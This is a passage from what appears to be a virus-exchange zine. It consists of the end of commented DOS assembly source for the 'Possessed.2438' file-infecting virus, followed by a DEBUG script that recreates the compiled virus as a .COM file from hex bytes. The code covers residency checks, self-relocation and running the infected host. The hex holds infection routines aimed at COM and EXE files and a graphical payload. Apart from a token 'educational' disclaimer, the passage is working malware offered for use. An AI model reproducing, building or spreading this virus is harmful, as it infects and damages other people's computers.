; Reached after int 21h/31h through the patched PSP terminate address, still
; in the virus segment. Puts the PSP words back, then runs the host program
; as a child process via EXEC and exits with the child's return code.
isTerminate:
push cs
push cs
pop ds
mov es,Psp
mov si,offset VirusStack     ; restore the six saved PSP words
mov di,0ah
mov cx,6
cld
repe movsw
pop es
cmp FirstGenerationFlag,1
jne NotFirstGen
mov FirstGenerationFlag,0    ; dropper: there is no host to run, just exit
jmp GetReturnCode
; Build the EXEC parameter block: environment, command tail at PSP:80h,
; FCBs at PSP:5Ch and PSP:6Ch.
NotFirstGen:
mov ax,Psp
mov si,offset ExecParam
mov [si+4],ax
mov word ptr [si+2],80h
mov [si+8],ax
mov word ptr [si+6],5ch
mov [si+12],ax
mov word ptr [si+10],6ch
mov ax,Environment
mov [si],ax
mov ah,30h                   ; DOS version: the full program path follows the environment only on DOS 3+
int 21h
mov DosVersion,al
cmp al,3
jc NameNotInEnvironment
mov ds,Environment
xor si,si
mov cx,200
; Look for the 01 00 count word that precedes the program path: [si]=1 and
; [si+3]=':' (the drive colon) identify it; DX = si+2 = start of the path.
FindFileName:
cmp byte ptr [si],1
jne CheckNextChar
cmp byte ptr [si+03],':'
jne CheckNextChar
mov dx,si
add dx,2
jmp FoundFileName
CheckNextChar:
inc si
loop FindFileName
; Fallback (DOS 2, or nothing found within 200 bytes): use the base name
; stored in this image at infection time, relative to the current directory.
NameNotInEnvironment:
push cs
pop ds
mov si,offset NameofVictim
mov di,offset VirusAsciiz
mov cx,13
cld
repe movsb
mov dx,offset VirusAsciiz

assume cs:Possessed, ds:nothing

FoundFileName:
cli
mov ViruSs,ss                ; EXEC is not guaranteed to preserve SS:SP
mov ViruSp,sp
sti
mov ax,4b00h
mov bx,offset ExecParam

cmp DosVersion,3
jc OldDos
call UseDos                  ; DOS 3+: straight to the original handler, bypassing DosHandler
jmp VictimExecuted

OldDos:
int 21h                      ; DOS 2: through the int 21h chain, i.e. through DosHandler as well
VictimExecuted:
cli
mov ss,ViruSs
mov sp,ViruSp
sti
push cs
pop ds
jnc GetReturnCode
mov dx,offset PossessedId    ; EXEC failed: print the ID text (the DisplayedText in the header)
mov ah,9
int 21h
GetReturnCode:
mov ah,4dh                   ; child's return code -> AL ...
int 21h
mov ah,4ch                   ; ... and exit with it
int 21h

NameofVictim db 13 dup (?)   ; base name of this file, written here by SetInfect before the image was saved

; Entry of an infected COM file, reached from the Jumper stub with
; BX = this offset and SI = LocEndOfFile (offset of the end of the virus
; in the file). CS = PSP here, hence the +100h on the image offsets.
ComEntry:
add si,100h                  ; SI -> end of the virus image in memory
push es
xor ax,ax
mov es,ax

cmp word ptr es:MemoryMarkerLoc,0   ; already resident? (a word compare; ExeEntry tests the byte)
je NotInMemory
pop es
sub si,5ah ;(VirusStack-SaveVictimCode) -- SI -> the host's saved first 90 bytes
mov di,100h
mov cx,(offset VirusStack-offset SaveVictimCode)/2
cld
repe movsw                   ; put them back over the stub and ID text ...
mov bx,100h
clc
jmp bx                       ; ... and run the original program

assume cs:Possessed, ds:Possessed

; Not resident: SI -> start of the virus image. Shared with ExeEntry from
; ExeNotInMemory on.
NotInMemory:
sub si,offset VirusStack
ExeNotInMemory:
pop es                       ; ES = PSP
push cs
pop ds
mov di,100h                  ; copy the image to PSP:100h in two steps: bytes [0, ExeNotInMemory) here ...
mov cx,offset ExeNotInMemory
shr cx,1
cld
repe movsw
mov cx,(offset VirusStack-offset ExeNotInMemory)   ; ... the remainder by SecondCodeMove in the copied code
mov DosIntSegment+100h,es    ; scratch far pointer in the image at CS:100h = PSP:SecondCodeMove+100h
mov DosIntOffset+100h,offset SecondCodeMove+100h
push es                      ; PSP, popped again by FirstGenerationEntry
jmp cs:DosInterrupt+100h

SaveVictimCode db 90 dup (?) ; first 90 bytes of the COM host; also the scratch DTA used by DosHandler
VirusStack dw ?              ; end of the 2438-byte image; SetUpPossessed saves the six PSP words from here (spilling into VirusAsciiz)
VirusAsciiz db 13 dup (?)    ; fallback host name built by isTerminate
ExecParam dw 7 dup (?)       ; EXEC parameter block (14 bytes)

Possessed ends

end PossessedEntry

ÄÄ POS2438.ASM ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


ÄÄ POS2438.SCR STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

N POS2438.COM
E 0100 2E 8B 1E 0C 01 2E 8B 36 0E 01 FF E3 AA 0B 4D 0B
E 0110 0D 50 4F 53 53 45 53 53 45 44 21 20 42 77 61 21
E 0120 20 68 61 21 20 68 61 21 20 68 61 21 20 68 61 21
E 0130 24 08 20 0A 0D 41 75 74 68 6F 72 3A 20 41 2E 20
E 0140 47 75 6D 62 61 20 26 20 45 2E 20 44 61 79 61 20
E 0150 6F 66 20 41 64 55 0A 1A 6F 75 67 68 74 20 74 6F
E 0160 20 79 6F 75 20 6C 69 76 65 20 62 79 20 48 45 58
E 0170 2D 46 49 4C 45 53 20 4E 6F 2E 20 32 0D 0A 0A 48
E 0180 45 58 2D 46 49 4C 45 53 20 61 6E 64 20 50 75 74
E 0190 6F 6B 73 61 20 4B 61 77 61 79 61 6E 20 61 72 65
E 01A0 20 6E 6F 74 20 72 65 73 70 6F 6E 73 69 62 6C 65
E 01B0 20 66 6F 72 20 61 63 74 75 61 6C 2C 20 69 6D 70
E 01C0 6C 69 65 64 20 61 6E 64 2F 6F 72 0D 0A 69 6D 61
E 01D0 67 69 6E 61 72 79 20 64 61 6D 61 67 65 20 62 72
E 01E0 6F 75 67 68 74 20 61 62 6F 75 74 20 62 79 20 74
E 01F0 68 65 20 75 73 65 2C 20 6D 69 73 75 73 65 20 6F
E 0200 72 20 6E 6F 6E 2D 75 73 65 20 6F 66 20 74 68 69
E 0210 73 20 76 69 72 69 69 2E 20 54 68 65 0D 0A 70 65
E 0220 72 73 6F 6E 20 77 68 6F 20 65 78 65 63 75 74 65
E 0230 73 20 74 68 69 73 20 76 69 72 69 69 20 62 65 61
E 0240 72 73 20 66 75 6C 6C 20 72 65 73 70 6F 6E 73 69
E 0250 62 69 6C 69 74 79 20 66 6F 72 20 68 69 73 2F 68
E 0260 65 72 20 61 63 74 69 6F 6E 73 2E 0D 0A 0A 54 68
E 0270 69 73 20 76 69 72 69 69 20 69 73 20 73 74 72 69
E 0280 63 74 6C 79 20 66 6F 72 20 65 64 75 63 61 74 69
E 0290 6F 6E 61 6C 20 61 6E 64 2F 6F 72 20 72 65 73 65
E 02A0 61 72 63 68 20 70 75 72 70 6F 73 65 73 20 6F 6E
E 02B0 6C 79 2E 0D 0A 0A 24 08 20 1A 0E 1F BA 07 01 B4
E 02C0 09 CD 21 B4 4C CD 21 06 33 C0 8E C0 E9 4A 07 0D
E 02D0 50 4F 53 53 45 53 53 45 44 21 20 42 77 61 21 20
E 02E0 68 61 21 20 68 61 21 20 68 61 21 20 68 61 21 24
E 02F0 08 20 0A 0D 41 75 74 68 6F 72 3A 20 41 2E 20 47
E 0300 75 6D 62 61 20 26 20 45 2E 20 44 61 79 61 20 6F
E 0310 66 20 41 64 55 0A 1A EB 37 90 06 00 4A 00 C5 0D
E 0320 2E 03 C5 0D B3 04 85 0E 08 04 35 05 20 00 05 00
E 0330 0A 22 68 24 C7 01 2E 0F 7B 01 01 01 08 04 0A 06
E 0340 00 00 00 00 00 00 00 00 00 00 00 00 6F 0E 75 0E
E 0350 9C 3D 00 4B 75 7C 1E 06 56 57 50 53 51 52 8B DA
E 0360 8A 1F 0E 1F 88 1E 00 07 88 1E 08 07 B4 2F E8 1C
E 0370 04 06 53 B4 1A BA 2C 09 E8 12 04 B9 21 00 BA 00
E 0380 07 B4 4E E8 07 04 73 1F BA 08 07 B4 4E E8 FD 03
E 0390 73 15 5A 1F B4 1A E8 F4 03 5A 59 5B 58 5F 5E 07
E 03A0 1F E8 1A 00 EB 2C 90 BA 2C 09 83 C2 1C 8B DA 8A
E 03B0 0E 00 07 88 0F C6 47 01 3A E8 02 00 EB D4 1E 06
E 03C0 56 57 50 53 51 52 EB 10 90 5A 59 5B 58 5F 5E 07
E 03D0 1F C3 9D 2E FF 2E 55 00 2E 8C 1E 61 00 2E 89 16
E 03E0 63 00 8B F2 83 C6 02 8B DE 80 3C 5C 75 06 8B DE
E 03F0 43 EB 06 90 80 3C 00 74 15 46 EB ED B8 24 25 2E
E 0400 8B 16 5D 00 2E 8E 1E 5F 00 E8 81 03 EB BB 8B F3
E 0410 0E 07 BF D6 08 B9 0D 00 FC F3 A4 1E 52 06 1F B8
E 0420 24 35 E8 68 03 8C 06 5F 00 89 1E 5D 00 B8 24 25
E 0430 BA B3 04 E8 57 03 5A 1F B8 00 43 E8 4F 03 72 BC
E 0440 2E 89 0E 65 00 B8 01 43 B9 20 00 E8 3F 03 72 EE
E 0450 B8 02 3D E8 37 03 72 E6 2E A3 67 00 8B D8 B8 00
E 0460 57 E8 29 03 2E 89 16 6B 00 2E 89 0E 69 00 BB FE
E 0470 FF B4 48 E8 17 03 73 07 B4 48 E8 10 03 72 BF 2E
E 0480 A3 6F 00 33 C9 8B D1 2E 8B 1E 67 00 B8 02 42 E8
E 0490 FB 02 72 07 2E A3 6D 00 E8 0D 03 72 11 2E 8B 0E
E 04A0 6D 00 33 D2 2E 8E 1E 6F 00 B4 3F E8 DF 02 72 25
E 04B0 0E 07 33 F6 81 3C 4D 5A 75 0A 81 7C 12 70 19 74
E 04C0 14 EB 4E 90 8B F1 81 EE 2B 04 78 06 81 3C 41 4B
E 04D0 74 03 EB 3D 90 2E 8E 06 6F 00 B4 49 E8 AE 02 2E
E 04E0 8B 1E 67 00 2E 8B 16 6B 00 2E 8B 0E 69 00 B8 01
E 04F0 57 E8 99 02 B4 3E E8 94 02 2E 8E 1E 61 00 2E 8B
E 0500 16 63 00 2E 8B 0E 65 00 B8 01 43 E8 7F 02 E9 B8
E 0510 FE 06 2E 8E 1E 61 00 2E 8B 36 63 00 8A 14 80 EA
E 0520 40 1F C6 06 74 00 01 BE 08 05 B9 0B 00 B0 17 E8
E 0530 88 02 BF D6 08 E8 8C 02 9C F6 D8 E8 7C 02 9D 72
E 0540 11 80 3E 53 00 03 73 02 EB 8B C6 06 74 00 04 EB
E 0550 18 90 B4 36 E8 36 02 33 D2 F7 E3 F7 E1 0B D2 75
E 0560 08 3D C4 09 73 03 E9 AB 00 2E 8B 1E 67 00 E8 37
E 0570 02 72 D5 2E 8E 1E 6F 00 33 F6 81 3C 4D 5A 75 13
E 0580 E9 40 01 2E 8B 1E 0C 01 2E 8B 36 0E 01 FF E3 AA
E 0590 0B 4D 0B 1E 1E BF 2C 09 B9 2D 00 FC F3 A5 07 0E
E 05A0 1F 8B 16 6D 00 80 3E 74 00 04 75 0F 89 16 CA 02
E 05B0 81 EA A3 FF 89 16 C8 02 EB 13 90 52 81 C2 E3 09
E 05C0 89 16 C8 02 5A 81 C2 86 09 89 16 CA 02 BE BC 02
E 05D0 33 FF B9 08 00 FC F3 A5 BE 08 00 B9 24 00 FC F3
E 05E0 A5 E8 C4 01 1F 2E 8B 0E 6D 00 2E 80 3E 74 00 04
E 05F0 75 04 81 E9 86 09 33 D2 B4 40 E8 90 01 73 03 E9
E 0600 46 FF 0E 1F BA 00 00 B9 86 09 B4 40 E8 7E 01 72
E 0610 EE E9 C1 FE 2E 8E 1E 61 00 2E 8B 16 63 00 B4 41
E 0620 E8 6A 01 E9 AF FE 9C 2E FF 06 71 00 75 07 2E FE
E 0630 0E 73 00 74 06 9D 2E FF 2E 59 00 9D B8 06 00 CD
E 0640 10 0E 1F 33 DB 33 D2 BE 5B 05 C7 06 85 01 C8 00
E 0650 C7 06 87 01 00 00 E8 3E 00 C7 06 85 01 C9 00 C7
E 0660 06 87 01 01 00 E8 2F 00 C7 06 85 01 BD 00 C7 06
E 0670 87 01 FF FF E8 20 00 C7 06 85 01 C9 00 C7 06 87
E 0680 01 FF FF E8 11 00 C7 06 85 01 BD 00 C7 06 87 01
E 0690 01 00 E8 02 00 EB B0 56 B0 01 B9 02 00 51 56 8A
E 06A0 1C 0A DB 74 16 8B CB 03 0E 85 01 8A 54 01 03 16
E 06B0 87 01 B4 0C CD 10 83 C6 02 EB E4 5E 32 C0 59 E2
E 06C0 DC 5E C3 C7 44 12 70 19 8B 44 0E 05 10 00 2E A3
E 06D0 79 00 8B 44 10 2E A3 7B 00 8B 44 14 2E A3 7F 00
E 06E0 8B 44 16 05 10 00 2E A3 7D 00 8B 44 04 83 7C 02
E 06F0 00 74 01 48 BB 00 02 F7 E3 03 44 02 83 D2 00 05
E 0700 0F 00 83 D2 00 25 F0 FF 2E A3 81 00 2E 89 16 83
E 0710 00 05 86 09 83 D2 00 72 5E F7 F3 0B D2 74 01 40
E 0720 89 44 04 89 54 02 2E A1 81 00 2E 8B 16 83 00 BB
E 0730 10 00 F7 F3 2B 44 08 2D 10 00 89 44 16 C7 44 14
E 0740 10 08 89 44 0E C7 44 10 86 0A 2E 8B 1E 67 00 E8
E 0750 56 00 B9 1C 00 33 D2 B4 40 E8 31 00 0E 1F 8B 16
E 0760 81 00 8B 0E 83 00 B8 00 42 E8 21 00 BA 00 00 B9
E 0770 86 09 B4 40 E8 16 00 E9 5B FD 33 C0 8E C0 26 8E
E 0780 16 F6 01 26 8B 26 F4 01 58 07 5D F9 C3 55 06 50
E 0790 33 C0 8E C0 26 89 26 F4 01 26 8C 16 F6 01 58 07
E 07A0 9C 2E FF 1E 55 00 5D C3 33 C9 8B D1 B8 00 42 E8
E 07B0 DB FF C3 B4 02 33 DB CD 10 C3 51 56 28 04 46 E2
E 07C0 FB 5E 59 C3 56 51 FC F3 A6 74 01 F9 59 5E C3 5A
E 07D0 66 64 64 58 65 5B 45 5A 66 64 32 75 74 78 78 6A
E 07E0 78 78 6A 69 46 45 67 9C 86 46 45 8D 86 46 45 8D
E 07F0 86 46 45 8D 86 46 45 8D 86 46 49 2D 45 2F 32 66
E 0800 9A 99 8D 94 97 5F 45 66 53 45 6C 9A 92 87 86 45
E 0810 4B 45 6A 53 45 69 86 9E 86 45 94 8B 45 66 89 7A
E 0820 2F 3F 41 4B 42 4B 42 4C 43 4C 44 4C 45 4C 43 4D
E 0830 46 4D 47 4D 44 4E 48 4E 49 4E 4A 4E 45 4F 4B 4F
E 0840 4C 4F B6 4A B5 4A B5 4B B4 4B B3 4B B2 4B B4 4C
E 0850 B1 4C B0 4C B3 4D AF 4D AE 4D AD 4D B2 4E AC 4E
E 0860 AB 4E 4C 54 4C 55 4D 55 4E 55 4F 56 50 56 51 56
E 0870 52 56 53 56 54 57 55 57 56 57 57 57 58 57 59 58
E 0880 5A 58 5B 58 5C 58 5D 58 5A 59 5B 59 5C 59 5D 59
E 0890 60 59 5F 59 60 59 61 59 62 59 5B 5A 5C 5A 63 5A
E 08A0 64 5A 65 5A 66 5A 67 5A 5C 5B 68 5B 69 5B 6A 5B
E 08B0 6B 5B 6C 5B 6D 5C 6E 5C 6F 5C 70 5D B1 53 B0 54
E 08C0 AF 54 AE 54 AD 55 AC 55 AB 55 AA 55 A9 55 A8 55
E 08D0 A7 56 A6 56 A5 56 A4 56 A3 56 A2 57 A1 57 A0 57
E 08E0 9F 57 9E 57 9D 57 9C 58 9B 58 9A 58 99 58 98 58
E 08F0 9A 59 99 59 98 59 97 59 96 59 95 59 94 59 93 59
E 0900 92 59 99 5A 98 5A 91 5A 90 5A 8F 5A 8E 5A 8D 5A
E 0910 98 5B 8C 5B 8B 5B 8A 5B 89 5B 88 5B 87 5B 86 5C
E 0920 85 5C 84 5C 83 5C 76 63 75 64 75 65 74 66 74 67
E 0930 73 68 73 69 72 6A 71 6B 71 6C 70 6D 70 6E 6F 6F
E 0940 6E 70 6E 71 7B 71 6D 72 7A 72 79 72 6D 73 78 73
E 0950 77 73 76 73 75 73 6C 74 71 74 72 74 73 74 74 74
E 0960 6C 75 6D 75 6E 75 6F 75 70 75 6B 76 6C 76 6D 81
E 0970 6E 81 6F 81 70 80 71 80 72 80 73 80 74 7F 75 7F
E 0980 76 7F 77 7F 78 7E 79 7E 7A 7E 7B 7E 7C 7D 7D 7D
E 0990 7E 7D 7F 7D 80 7D 81 7C 82 7C 83 7C 84 7C 85 7B
E 09A0 86 7B 87 7B 88 7B 89 7A 8A 7A 8B 7A 8C 7A 8D 79
E 09B0 8E 79 8F 79 90 79 91 78 92 78 93 78 94 77 95 77
E 09C0 96 76 97 76 98 75 00 43 3A 2A 2E 43 4F 4D 00 43
E 09D0 3A 2A 2E 45 58 45 00 06 33 C0 8E C0 26 80 3E EC
E 09E0 01 00 75 06 BE 00 01 E9 E8 01 07 8C C0 2E 03 06
E 09F0 79 01 8E D0 2E 8B 26 7B 01 8C C0 2E 03 06 7D 01
E 0A00 2E A3 57 01 2E A1 7F 01 2E A3 55 01 F8 2E FF 2E
E 0A10 55 01 FC F3 A4 33 C0 8E C0 26 C6 06 EC 01 01 58
E 0A20 05 10 00 50 B8 62 07 50 CB 8B C4 2D 00 01 8B E0
E 0A30 8C C8 8E D8 8E D0 1E 2D 10 00 8E C0 8C 06 87 00
E 0A40 50 26 A1 2C 00 A3 85 00 58 1E 06 8E D8 0E 07 BE
E 0A50 0A 00 BF 86 09 B9 06 00 FC F3 A5 BB 14 08 89 1E
E 0A60 0A 00 8C 0E 0C 00 07 1F 07 BE 13 05 B9 48 00 51
E 0A70 B0 25 E8 45 FD BF 08 00 56 FC F3 A4 5E 59 F6 D8
E 0A80 E8 37 FD A1 10 07 05 1B 02 CD 21 89 1E 55 00 8C
E 0A90 06 57 00 BA 50 00 80 EC 10 E8 F1 FC C7 06 71 00
E 0AA0 00 00 8A 16 74 00 88 16 73 00 05 E7 0F E8 DD FC
E 0AB0 89 1E 59 00 8C 06 5B 00 BA 5F 03 80 EC 10 E8 CC
E 0AC0 FC 0E 1F 8E 06 87 00 B4 49 E8 C1 FC BA 86 09 B1
E 0AD0 04 D3 EA 83 C2 20 B4 31 E8 B2 FC 0E 0E 1F 8E 06
E 0AE0 87 00 BE 86 09 BF 0A 00 B9 06 00 FC F3 A5 07 80
E 0AF0 3E 54 00 01 75 08 C6 06 54 00 00 E9 97 00 A1 87
E 0B00 00 BE 95 09 89 44 04 C7 44 02 80 00 89 44 08 C7
E 0B10 44 06 5C 00 89 44 0C C7 44 0A 6C 00 A1 85 00 89
E 0B20 04 B4 30 CD 21 A2 53 00 3C 03 72 1F 8E 1E 85 00
E 0B30 33 F6 B9 C8 00 80 3C 01 75 0E 80 7C 03 3A 75 08
E 0B40 8B D6 83 C2 02 EB 15 90 46 E2 EA 0E 1F BE D6 08
E 0B50 BF 88 09 B9 0D 00 FC F3 A4 BA 88 09 FA 2E 8C 16
E 0B60 75 00 2E 89 26 77 00 FB B8 00 4B BB 95 09 2E 80
E 0B70 3E 53 00 03 72 06 E8 14 FC EB 03 90 CD 21 FA 2E
E 0B80 8E 16 75 00 2E 8B 26 77 00 FB 0E 1F 73 07 BA 08
E 0B90 00 B4 09 CD 21 B4 4D CD 21 B4 4C CD 21 50 4F 53
E 0BA0 32 34 33 38 2E 43 4F 4D 00 00 81 C6 00 01 06 33
E 0BB0 C0 8E C0 26 83 3E EC 01 00 74 13 07 83 EE 5A BF
E 0BC0 00 01 B9 2D 00 FC F3 A5 BB 00 01 F8 FF E3 81 EE
E 0BD0 86 09 07 0E 1F BF 00 01 B9 0B 09 D1 E9 FC F3 A5
E 0BE0 B9 7B 00 8C 06 57 01 C7 06 55 01 4B 08 06 2E FF
E 0BF0 2E 55 01 E9 B7 01 0D 20 20 20 0D 0A 4D 61 62 75
E 0C00 68 61 79 21 0D 0A 0A 54 68 69 73 20 69 73 20 50
E 0C10 6F 73 73 65 73 73 65 64 2E 32 34 33 38 20 76 69
E 0C20 72 75 73 20 63 6F 6D 69 6E 67 20 74 6F 20 79 6F
E 0C30 75 20 66 72 6F 6D 20 74 68 65 20 50 68 69 6C 69
E 0C40 70 70 69 6E 65 73 2E 0D 0A 42 72 6F 75

RCX
0B4D
W
Q

ÄÄ POS2438.SCR ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

EoF.
